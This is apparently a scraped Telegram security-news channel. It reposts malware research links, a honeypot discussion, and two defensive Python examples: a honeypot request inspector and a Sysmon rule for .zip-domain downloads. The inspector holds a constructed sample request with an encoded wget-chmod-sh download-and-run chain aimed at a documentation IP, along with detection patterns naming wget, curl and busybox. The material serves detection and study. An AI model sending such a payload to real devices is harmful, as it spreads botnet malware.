Malware News
12.7K subscribers
1.63K photos
7 videos
130 files
7.78K links
The latest NEWS about malware, DFIR, hacking, security issues, thoughts and ...

Partner channel: @cveNotify

For ads: https://telega.io/c/malwr
Recently we found a suspicious shellcode running in the memory of a system process. We decided to investigate how the shellcode was initially placed into the process and where on the infected system the threat was hidden.

We named this #malware #Minas 👉 https://kas.pr/fn5y
🗣 e_kaspersky


🎖 @malwr
This is interesting reading regarding the .zip TLD. However, it's of near zero consequence to phishing attacks, read it first then I'll explain: https://medium.com/@bobbyrsec/the-dangers-of-googles-zip-tld-5e1e675e59a5
🗣 troyhunt


🎖 @malwr
People that run a honeypot: what hosting company are you using? What is your favourite software?
Hi all,
I'd like to run a honeypot in the hope of collecting some current malware samples. If you are a honeypot admin, then I have some questions for you:

1) What software are you running, and why?
2) Which hosting company is hosting your honeypot/honeypots?
3) How much do you pay every month?
4) What software would you suggest for a cheap/low-end VPS?
5) After how many hours/days did you collect the first binary sample in your honeypot?

I have done some research and I found an incredible AIO solution called T-POT. It is a collection of the most used honeypots (cowrie, dionaea etc.), but it requires 8+ GB of RAM and 150 GB of HDD space… so it will not be cheap to host this 😕

Thanks a lot!
🗣 Luca-91

I run a custom HTTP honeypot at the edge of my home network and on a cheap VPS. I'm able to find command injection attempts in payloads and headers, which usually yield Mirai and Mozi samples.

Overall, I collect the request data and store it in a MySQL table for aggregating stats.
👀 issued-username

T-pot, set a few malware files in the server as well
👀 dumpsteraccount01

I run 3 honeypots on EC2/Lightsail instances at AWS. I am mainly using Snort/Suricata to detect attacks against the devices, so not so much a 'honeypot', but I am in the process of standing up more low-interaction true honeypots on the platform. Lightsail can do fixed cost at price points like $5/$10/$20; the overall price with a syslog server to aggregate everything is something like $30-40 per month, maybe a little less. Hard to tell, since I am running lots of other things on AWS.

T-POT is the extreme end of honeypots... not worth it for me.

Self-Promotion: https://beesting.tools/
👀 panscanner


🎖 @malwr
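The request-inspection step issued-username describes (find command-injection attempts in the payload and headers, keep the request for stats), written out as an added example; this is not code from any poster in the thread. It parses a raw HTTP/1.x request, URL-decodes the target, headers and body so encoded metacharacters such as %3B become visible, flags shell-injection markers typical of IoT-botnet scanners, and pulls out the URLs the injected command would download from, which is exactly what a sample collector needs. The two sample requests, the IP addresses and the pattern list are constructed; the poster uses MySQL, SQLite is used here so it runs offline.

```python
import re
import sqlite3
from typing import Optional
from urllib.parse import unquote_plus

# Constructed list of shell-injection markers seen in IoT-botnet scanning traffic:
# a downloader launched after a command separator or inside $( ), the
# "make executable, then run" sequence, busybox, and drops into /tmp.
INJECTION_PATTERNS = [
    re.compile(p) for p in (
        r"(^|[;&|`$(])\s*(wget|curl|tftp|ftpget)\s+\S",
        r"\bchmod\s+[0-7]{3,4}\b",
        r"\b(sh|bash)\s+\S+\.sh\b",
        r"\bbusybox\b",
        r"/tmp/[\w.]+",
    )
]
URL_RE = re.compile(r"https?://[^\s'\";|&)]+")


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request (no chunked bodies) into method, target,
    headers and body, URL-decoding each part so encoded payloads are inspectable."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _ = (lines[0].split(" ", 2) + ["", ""])[:3]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = unquote_plus(value.strip())
    return {
        "method": method,
        "target": unquote_plus(target),
        "headers": headers,
        "body": unquote_plus(body.decode("latin-1")),
    }


def inspect(req: dict) -> dict:
    """Return which patterns hit in which field, plus every download URL found."""
    fields = {"target": req["target"], "body": req["body"]}
    fields.update({f"header:{k}": v for k, v in req["headers"].items()})
    hits, urls = [], set()
    for field, text in fields.items():
        for pat in INJECTION_PATTERNS:
            if pat.search(text):
                hits.append((field, pat.pattern))
        urls.update(URL_RE.findall(text))
    return {"suspicious": bool(hits), "hits": hits, "download_urls": sorted(urls)}


def record(conn: sqlite3.Connection, src_ip: str, req: dict, verdict: dict) -> None:
    """Persist one request so stats can be aggregated later (schema is assumed)."""
    conn.execute(
        "CREATE TABLE IF NOT EXISTS hits "
        "(src_ip TEXT, method TEXT, target TEXT, suspicious INTEGER, urls TEXT)"
    )
    conn.execute(
        "INSERT INTO hits VALUES (?, ?, ?, ?, ?)",
        (src_ip, req["method"], req["target"], int(verdict["suspicious"]),
         " ".join(verdict["download_urls"])),
    )


# Constructed sample: a form POST whose value carries an encoded download-and-run
# chain, in the style of router exploitation attempts; the host is a documentation IP.
SAMPLE_REQUEST = (
    b"POST /cgi-bin/config HTTP/1.1\r\n"
    b"Host: 192.0.2.10\r\n"
    b"User-Agent: Mozilla/5.0 (compatible)\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"hostname=$(cd+/tmp%3B+wget+http://198.51.100.7/bins.sh"
    b"%3B+chmod+777+bins.sh%3B+sh+bins.sh)"
)
# Constructed benign request: a curl User-Agent alone must not trip the rules.
SAMPLE_BENIGN = b"GET / HTTP/1.1\r\nHost: 192.0.2.10\r\nUser-Agent: curl/8.0\r\n\r\n"


def run_sample(src_ip: str = "203.0.113.5", db: Optional[sqlite3.Connection] = None):
    """Inspect both samples, store them, and return (verdicts, suspicious_row_count)."""
    conn = db or sqlite3.connect(":memory:")
    verdicts = []
    for raw in (SAMPLE_REQUEST, SAMPLE_BENIGN):
        req = parse_request(raw)
        verdict = inspect(req)
        record(conn, src_ip, req, verdict)
        verdicts.append(verdict)
    count = conn.execute("SELECT COUNT(*) FROM hits WHERE suspicious=1").fetchone()[0]
    return verdicts, count
```

The downloader pattern deliberately requires an argument after the command name, so a legitimate `curl/8.0` User-Agent does not count as injection; the URL regex stops at shell separators and the closing parenthesis of `$( )`, so the extracted URL is directly fetchable by a collector.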
#Sysmon can log FileCreateStreamHash events (Zone.Identifier; ADS) since v11.10, which allows us to write a Sigma rule that looks for suspicious files downloaded from .zip domains #ZipTLD

blog with explanations
https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/

Rule
https://github.com/SigmaHQ/sigma/pull/4250/files#diff-59c47b72f788177a5a0ad98c0489cd3dfb5cddc7d61a4fb2e94dd688ec15f075
🗣 cyb3rops


🎖 @malwr
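The detection logic behind such a rule, as an added example; it is neither cyb3rops' Sigma rule nor Sysmon's own code. It takes the text Sysmon records in the Contents field of a FileCreateStreamHash (Event ID 15) record for a Zone.Identifier stream, parses the [ZoneTransfer] key/value pairs, and alerts when the hostname of HostUrl or ReferrerUrl ends in a .zip label. The sample records are constructed, the exact whitespace Sysmon puts between keys is an assumption (the parser accepts both newline- and space-separated text), and the alerting TLD set is a parameter so the same code covers any other TLD you decide to treat the same way. Hostnames are taken from the URL's authority part, so a familiar name placed before an @ as user-info is attributed to the real host after it.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# TLDs to alert on; Google's .zip is the one the rule targets. Assumed configurable.
SUSPICIOUS_TLDS = frozenset({"zip"})

# Zone.Identifier is the INI-style [ZoneTransfer] text Windows writes; only these
# keys matter for the rule. Values never contain whitespace, so \S+ is enough.
KV_RE = re.compile(r"\b(ZoneId|ReferrerUrl|HostUrl)=(\S+)")


def parse_zone_identifier(contents: str) -> dict:
    """Return the [ZoneTransfer] keys as a dict, whether the text is newline-separated
    (as on disk) or space-joined (assumed rendering in Sysmon's Contents field)."""
    return {k: v for k, v in KV_RE.findall(contents)}


def hostname_of(url: str) -> Optional[str]:
    """Hostname from the authority part, so 'https://www.example.com@update.zip/x'
    resolves to 'update.zip', not 'www.example.com'."""
    try:
        host = urlsplit(url).hostname
    except ValueError:  # e.g. malformed IPv6 literal
        return None
    return host.rstrip(".") if host else None


def has_suspicious_tld(host: Optional[str], tlds=SUSPICIOUS_TLDS) -> bool:
    """True when the last DNS label of host is in tlds (IP literals never match)."""
    return bool(host) and host.rsplit(".", 1)[-1] in tlds


def evaluate_event(event: dict) -> dict:
    """Apply the rule to one Sysmon Event ID 15 record (field names as Sysmon uses
    them). Alerts only for Zone.Identifier streams whose URLs point at a suspicious TLD."""
    target = event.get("TargetFilename", "")
    if not target.endswith(":Zone.Identifier"):
        return {"alert": False, "reason": "not a Zone.Identifier stream"}
    zone = parse_zone_identifier(event.get("Contents", ""))
    offending = []
    for key in ("HostUrl", "ReferrerUrl"):
        if key in zone:
            host = hostname_of(zone[key])
            if has_suspicious_tld(host):
                offending.append((key, host))
    return {
        "alert": bool(offending),
        "file": target.rsplit(":", 1)[0],
        "zone_id": zone.get("ZoneId"),
        "offending": offending,
    }


# Constructed Sysmon Event ID 15 records, reduced to the fields the rule reads.
SAMPLE_EVENTS = [
    {   # download served from a .zip domain: alert
        "TargetFilename": r"C:\Users\bob\Downloads\invoice.pdf:Zone.Identifier",
        "Contents": "[ZoneTransfer]  ZoneId=3  ReferrerUrl=https://mail.example.com/  "
                    "HostUrl=https://files.example.zip/invoice.pdf",
    },
    {   # familiar name before '@' is user-info; the real host is a .zip domain: alert
        "TargetFilename": r"C:\Users\bob\Downloads\update.zip:Zone.Identifier",
        "Contents": "[ZoneTransfer]\r\nZoneId=3\r\n"
                    "HostUrl=https://www.example.com@update.zip/update.zip\r\n",
    },
    {   # ordinary download of a file that merely has a .zip extension: no alert
        "TargetFilename": r"C:\Users\bob\Downloads\tools.zip:Zone.Identifier",
        "Contents": "[ZoneTransfer]  ZoneId=3  HostUrl=https://downloads.example.com/tools.zip",
    },
    {   # a different ADS on the same file: out of scope for this rule
        "TargetFilename": r"C:\Users\bob\Downloads\tools.zip:notes.txt",
        "Contents": "shopping list",
    },
]


def run_samples() -> list:
    return [evaluate_event(e) for e in SAMPLE_EVENTS]
```

The third sample is the false positive a naive rule on the file name would raise: the point of matching on the Zone.Identifier URLs rather than on `*.zip` in TargetFilename is to distinguish a file fetched from a .zip domain from an archive fetched from anywhere.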
Team Cymru's S2 Research Team look at the QakBot infrastructure, drawing out some high-level trends and anomalies based on their ongoing tracking of the malware's command-and-control (C2) infrastructure. https://www.team-cymru.com/post/visualizing-qakbot-infrastructure
🗣 virusbtn


🎖 @malwr
Security researcher @embee_research analyses the Quasar RAT C2 configuration and uses this information to pivot to additional servers utilising Shodan and Censys. https://embee-research.ghost.io/hunting-quasar-rat-shodan/
🗣 virusbtn


🎖 @malwr
Thoth is now usable directly from VS Code; we just released an extension.

https://github.com/FuzzingLabs/thoth/tree/master/vscode-extension

You can generate callgraphs and run all the analyzers for both Cairo and Sierra directly from the UI.
🗣 FuzzingLabs


🎖 @malwr
Insider Threat Mitigation Guide
Source: Cybersecurity & Infrastructure Security Agency
Download Link:
https://www.cisa.gov/sites/default/files/publications/Insider%20Threat%20Mitigation%20Guide_Final_508.pdf
For more unique resources and tools for the cyber community, please visit:
https://cyberstartupobservatory.com/cyber-startup-observatory-community/
#CyberSecurity #InfoSec #InformationSecurity
🗣 JMonteagudoE


🎖 @malwr
Trend Micro’s Fyodor Yarochkin, Zhengyu Dong & Paul Pajares present an overview of the Lemon Group’s use of pre-infected mobile devices and how this scheme is potentially being developed and expanded to other IoT devices. https://www.trendmicro.com/en_us/research/23/e/lemon-group-cybercriminal-businesses-built-on-preinfected-devices.html
🗣 virusbtn


🎖 @malwr